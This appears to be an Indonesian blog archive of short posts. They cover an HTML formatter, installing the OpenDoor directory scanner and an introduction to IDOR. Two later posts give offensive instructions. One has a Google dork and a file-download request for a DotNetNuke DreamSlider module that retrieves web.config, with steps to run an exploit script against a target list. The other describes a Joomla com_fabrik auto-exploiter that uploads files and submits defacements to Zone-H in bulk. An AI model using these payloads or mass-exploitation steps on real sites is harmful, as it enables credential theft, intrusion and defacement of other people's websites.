Thursday, 22 February 2018

Merapihkan Source Code HTML dengan HTML Formatter

Pernahkah kalian ketika ingin belajar atau mencari suatu contoh desain website di google dan ingin mengambil atau mengcopy nya ke localhost dibuat sulit dengan source code HTML yang berantakan yang membuat pusing?


Yap, seperti inilah contohnya. Sering kali kita menemui ini pada website-website besar ataupun website penyedia template seperti themeforest. Source code HTML ini memang sengaja dibuat kurang rapih seperti ini. Tujuannya adalah menyulitkan seseorang yang ingin mengcopy halaman website tersebut. Karena sebagian orang akan menganggap kerja 2x, yaitu merapihkan kembali source HTML nya agar mudah diedit.

Tenang saja, bagi yang belum tau dan masih saja merapihkan manual ketika mendapati hal seperti ini. Berikut merupakan cara merapihkan source HTML ini dengan HTML Formatter.

1. Bukalah situs berikut ini
https://www.freeformatter.com/html-formatter.html
**Jika source codenya berupa PHP. Anda bisa mencobannya disitus http://www.phpformatter.com/**

2. Masukan source code HTML yang berantakan tadi kesana.

Ada 2 pilihan opsi disana, kalian bisa memasukkan pada kotak yang tersedia atau mengupload source HTML dari file.

3. Lalu 'Klik' FORMAT HTML di button bagian bawah, pilih saja yang FORMAT HTML IN NEW WINDOW agar terlihat jelas semua.


(Hasil dari HTML Formatter akan terlihat tersusun dengan baik seperti gambar diatas)

Yap, oke begitu saja. Mudah kan? hehhehe
Sekian dulu, semoga bermanfaat.

Sunday, 18 February 2018

File dan Folder Scanner dengan OWASP OpenDoor



Kali ini saya akan review tools scanner terbaik dan yang paling sering saya gunakan. OWASP OpenDoor Web Directory Scanner.


Sesuai judul, kegunaan tools ini adalah untuk scanning/mencari file dan folder secara otomatis berdasarkan wordlist yang sudah disiapkan. 

Untuk informasi lebih lengkap mengenai tools ini bisa langsung kunjungi link berikut:

Karena tools ini menggunakan Python3, anda harus menginstall Python Versi 3 terlebih dahulu.
Caranya adalah sebagai berikut:

2. Download Python Versi 3.*
3. Install Python Versi 3.*

NB: * adalah rilis versi yang tersedia.

Jika sudah, berikut adalah tutorial cara install tools OWASP OpenDoor:
 git clone https://github.com/stanislav-web/OpenDoor.git
 cd OpenDoor/
 pip install -r requirements.txt
 chmod +x opendoor.py
Untuk menjalankan toolsnya:
 python3 opendoor.py --host http://www.example.com

Jika berhasil menemukan file atau folder responsenya akan seperti ini:
OK /namafolder/ atau OK /namafile.format

Tuesday, 23 January 2018

Memahami dan Menemukan Kerentanan Insecure Direct Object Reference

Memahami dan Menemukan Kerentanan Insecure Direct Object Reference - Kali ini kembali saya membahas tentang security. Yang akan kita bahas kali ini adalah tentang Insecure Direct Object Reference atau IDOR vulnerability. Apa itu IDOR? Seberapa berbahayakah kerentanan ini? Mari kita bahas sama sama.

Saturday, 30 December 2017

dotNetNuke DreamSlider Arbitrary File Download



Exploit Title: dotNetNuke DreamSlider Arbitrary File Download
Google Dork: inurl://DesktopModules/DreamSlider/
Exploit: /DesktopModules/DreamSlider/DownloadProvider.aspx?File=~/web.config


------------------------------------------------------------------------
1. Masukan list target ke dalam file.txt

http://target.com/
http://target2.com/

2. Jalankan php exploit.php target.txt


Tuesday, 12 December 2017

Joomla Component com_fabrik Arbitrary File Upload



Joomla Component com_fabrik Arbitrary File Upload
Author:
Et04 - bL@cKID

Auto Exploiter 
(Auto Upload, and Auto Submit Zone -H)
Coded by: L0c4lh34rtz - IndoXploit



********************************
********************************

1. Siapkan sebuah list target dalam sebuah file (target.txt), yang isinya seperti contoh berikut:
http://www.target.com/

2. Langsung saja jalankan toolsnya:
php fabrik.php target.txt

3. Jangan lupa selalu perhatikan perintah dalam scriptnya, untuk mengganti hal-hal yang diperlukan.

4. Result otomatis disimpan dalam file result_fabrik.txt


Oke sekian dulu :D